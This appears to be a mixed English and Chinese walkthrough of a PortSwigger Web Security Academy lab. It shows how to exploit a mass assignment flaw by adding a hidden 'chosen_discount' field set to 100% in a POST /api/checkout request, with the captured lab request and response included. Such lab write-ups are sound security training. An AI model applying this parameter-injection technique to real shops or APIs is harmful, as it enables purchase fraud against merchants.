1 Overview
To solve the lab, find and exploit a mass assignment vulnerability to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter
2 Required knowledge
To solve this lab, you'll need to know:
- What mass assignment is.
- Why mass assignment may result in hidden parameters.
- How to identify hidden parameters.
- How to exploit mass assignment vulnerabilities.
These points are covered in our API Testing Academy topic.
3 解题思路
3.1 正常业务流程
- 访问Lab: Exploiting a mass assignment vulnerability,点击ACCESS THE LAB,跳转到靶机首页
-
使用提供的账号和密码
wiener:peter登录 -
登录成功,返回用户信息,注意金额为
$0.00 -
按照题目要求,需要购买Lightweight l33t Leather Jacket,查看详情,在详情页可以把商品加入购物车
-
进入购物车,订单中商品Lightweight l33t Leather Jacket的数量为1,单价为
$1337,00,订单总金额$1337,00,点击Place order提交支付,提示余额不足 -
到此,购买商品Lightweight l33t Leather Jacket的业务流程已经走完了,在余额不足的情况下,需要尝试找出支付成功的方案
3.2 解决思路
- 查看所有接口,关注
MIME type为json的请求 - 在支付订单时,先发起一个请求
GET /api/checkout查询订单信息,再发起支付请求
POST /api/checkout HTTP/2
Host: 0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net
Cookie: session=u3e7t4txepvHOPNYlgZMfeH2WhbjdoRv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net/cart
Content-Type: text/plain;charset=UTF-8
Content-Length: 53
Origin: https://0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
"chosen_products":[
{
"product_id":"1",
"quantity":1
}
]
}
- 对比GET请求的返回报文和POST请求的body,发现可能存在的隐藏参数chosen_discount,item_price
{
"chosen_discount": {
"percentage": 0
},
"chosen_products": [
{
"product_id": "1",
"name": "Lightweight \"l33t\" Leather Jacket",
"quantity": 1,
"item_price": 133700
}
]
}
-
尝试在
POST /api/checkout HTTP/2中依次增加上述的隐藏参数 -
chosen_discount设置折扣100%,0元购成功
